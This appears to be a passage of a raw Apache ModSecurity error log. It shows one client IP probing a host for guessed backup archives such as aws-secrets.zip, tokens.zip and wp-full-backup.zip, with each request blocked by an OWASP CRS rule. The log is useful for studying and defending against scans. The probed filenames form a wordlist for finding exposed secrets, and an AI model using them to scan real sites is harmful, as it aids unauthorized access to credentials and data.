"OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/theme.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4cAAAAAM"] [Sun Mar 08 19:04:42.757158 2026] [:error] [pid 13472:tid 13503] [client 35.189.151.148:44268] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/meeting_notes.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9FwAAAEE"] [Sun Mar 08 19:04:42.757199 2026] [:error] [pid 13471:tid 13492] [client 35.189.151.148:44218] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wordpress-site.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4cQAAABE"] [Sun Mar 08 19:04:42.758105 2026] [:error] [pid 13605:tid 13628] [client 35.189.151.148:44610] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/original-backup.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf1wAAANU"] [Sun Mar 08 19:04:42.759260 2026] [:error] [pid 13471:tid 13479] [client 35.189.151.148:38016] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/custom.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4cgAAAAQ"] [Sun Mar 08 19:04:42.759282 2026] [:error] [pid 13605:tid 13608] [client 35.189.151.148:40910] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archives.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf2AAAAME"] [Sun Mar 08 19:04:42.759378 2026] [:error] [pid 7010:tid 7061] [client 35.189.151.148:38146] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/dumps.zip"] [unique_id "aa2sKpq2Bzew8vjPgCG-hAAAAZg"] [Sun Mar 08 19:04:42.761550 2026] [:error] [pid 13471:tid 13489] [client 35.189.151.148:44336] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/2024_backup.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4cwAAAA4"] [Sun Mar 08 19:04:42.764518 2026] [:error] [pid 13471:tid 13497] [client 35.189.151.148:39584] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_configs.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4dAAAABY"] [Sun Mar 08 19:04:42.773093 2026] [:error] [pid 13471:tid 13482] [client 35.189.151.148:42834] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/tokens.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4dQAAAAc"] [Sun Mar 08 19:04:42.775646 2026] [:error] [pid 13605:tid 13626] [client 35.189.151.148:42342] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-cost.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf2QAAANM"] [Sun Mar 08 19:04:42.775661 2026] [:error] [pid 29564:tid 29580] [client 35.189.151.148:42112] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/outbox.zip"] [unique_id "aa2sKgemqWLB0zKFm0TYVwAAAQg"] [Sun Mar 08 19:04:42.775661 2026] [:error] [pid 13471:tid 13490] [client 35.189.151.148:40496] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/var.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4dgAAAA8"] [Sun Mar 08 19:04:42.775679 2026] [:error] [pid 13605:tid 13630] [client 35.189.151.148:40430] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive-5.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf2gAAANc"] [Sun Mar 08 19:04:42.775730 2026] [:error] [pid 7010:tid 7040] [client 35.189.151.148:42034] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-includes_backup.zip"] [unique_id "aa2sKpq2Bzew8vjPgCG-hQAAAYM"] [Sun Mar 08 19:04:42.775753 2026] [:error] [pid 12902:tid 12950] [client 35.189.151.148:37806] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-full-backup.zip"] [unique_id "aa2sKmaTUOdovAC89_RAxQAAAo8"] [Sun Mar 08 19:04:42.777640 2026] [:error] [pid 11078:tid 11112] [client 35.189.151.148:39376] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-functions.zip"] [unique_id "aa2sKn-dmvIeGeY060kivQAAAcI"] [Sun Mar 08 19:04:42.777639 2026] [:error] [pid 13471:tid 13491] [client 35.189.151.148:43258] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/drivers.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4dwAAABA"] [Sun Mar 08 19:04:42.777662 2026] [:error] [pid 13605:tid 13622] [client 35.189.151.148:39918] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-secrets.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf3AAAAM8"] [Sun Mar 08 19:04:42.777663 2026] [:error] [pid 13471:tid 13481] [client 35.189.151.148:41984] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/customer.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4eAAAAAY"] [Sun Mar 08 19:04:42.777700 2026] [:error] [pid 13605:tid 13616] [client 35.189.151.148:38078] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/february.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf2wAAAMk"] [Sun Mar 08 19:04:42.777714 2026] [:error] [pid 13605:tid 13611] [client 35.189.151.148:38594] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/vendor.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf3QAAAMQ"] [Sun Mar 08 19:04:42.777721 2026] [:error] [pid 13473:tid 13514] [client 35.189.151.148:40232] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/includes.zip"] [unique_id "aa2sKkwwZGElJGd8aN_6LwAAAIA"] [Sun Mar 08 19:04:42.777746 2026] [:error] [pid 29564:tid 29594] [client 35.189.151.148:44212] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/app-backup.zip"] [unique_id "aa2sKgemqWLB0zKFm0TYWAAAARY"] [Sun Mar 08 19:04:42.777907 2026] [:error] [pid 29564:tid 29593] [client 35.189.151.148:37748] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/patches.zip"] [unique_id "aa2sKgemqWLB0zKFm0TYWQAAARU"] [Sun Mar 08 19:04:42.777966 2026] [:error] [pid 13473:tid 13542] [client 35.189.151.148:42040] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/final-backup.zip"] [unique_id "aa2sKkwwZGElJGd8aN_6MAAAAI8"] [Sun Mar 08 19:04:42.777985 2026] [:error] [pid 13473:tid 13549] [client 35.189.151.148:37570] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/error_logs.zip"] [unique_id "aa2sKkwwZGElJGd8aN_6MQAAAJQ"] [Sun Mar 08 19:04:42.777992 2026] [:error] [pid 29564:tid 29595] [client 35.189.151.148:44038] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/final_release.zip"] [unique_id "aa2sKgemqWLB0zKFm0TYWgAAARc"] [Sun Mar 08 19:04:42.778058 2026] [:error] [pid 13473:tid 13531] [client 35.189.151.148:43760] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/smtp.zip"] [unique_id "aa2sKkwwZGElJGd8aN_6MgAAAIk"] [Sun Mar 08 19:04:42.778104 2026] [:error] [pid 13472:tid 13509] [client 35.189.151.148:40756] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/postgresql.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9GAAAAEY"] [Sun Mar 08 19:04:42.779546 2026] [:error] [pid 13473:tid 13538] [client 35.189.151.148:39950] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/2024.zip"] [unique_id "aa2sKkwwZGElJGd8aN_6MwAAAI0"] [Sun Mar 08 19:04:42.779554 2026] [:error] [pid 13471:tid 13483] [client 35.189.151.148:42178] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/staging-backup.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4eQAAAAg"] [Sun Mar 08 19:04:42.779709 2026] [:error] [pid 12902:tid 12958] [client 35.189.151.148:44638] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/temp.zip"] [unique_id "aa2sKmaTUOdovAC89_RAxgAAApc"] [Sun Mar 08 19:04:42.779740 2026] [:error] [pid 7010:tid 7057] [client 35.189.151.148:43552] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/restore_point.zip"] [unique_id "aa2sKpq2Bzew8vjPgCG-hgAAAZQ"] [Sun Mar 08 19:04:42.779896 2026] [:error] [pid 27307:tid 27333] [client 35.189.151.148:39932] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/administration.zip"] [unique_id "aa2sKgo1nI2o7tYBWw9SbgAAAVg"] [Sun Mar 08 19:04:42.871399 2026] [:error] [pid 13471:tid 13488] [client 35.189.151.148:43658] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/support.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4egAAAA0"] [Sun Mar 08 19:04:42.871399 2026] [:error] [pid 11078:tid 11125] [client 35.189.151.148:42296] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/articles.zip"] [unique_id "aa2sKn-dmvIeGeY060kivgAAAc8"] [Sun Mar 08 19:04:43.272675 2026] [:error] [pid 13472:tid 13502] [client 35.189.151.148:37800] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/cloud.zip"] [unique_id "aa2sK13UyizU6P-l0YL9GQAAAEA"] [Sun Mar 08 19:04:43.670504 2026] [:error] [pid 13472:tid 13511] [client 35.189.151.148:60136] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/pop3.zip"] [unique_id "aa2sK13UyizU6P-l0YL9GgAAAEg"] [Sun Mar 08 19:04:43.875855 2026] [:error] [pid 11078:tid 11115] [client 35.189.151.148:43284] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/nov.zip"] [unique_id "aa2sK3-dmvIeGeY060kivwAAAcU"] [Sun Mar 08 19:04:43.877137 2026] [:error] [pid 13471:tid 13487] [client 35.189.151.148:40708] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/report.zip"] [unique_id "aa2sK78gLDtA4xTIJqD4fgAAAAw"] [Sun Mar 08 19:04:44.073676 2026] [:error] [pid 11078:tid 11118] [client 35.189.151.148:40670] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag 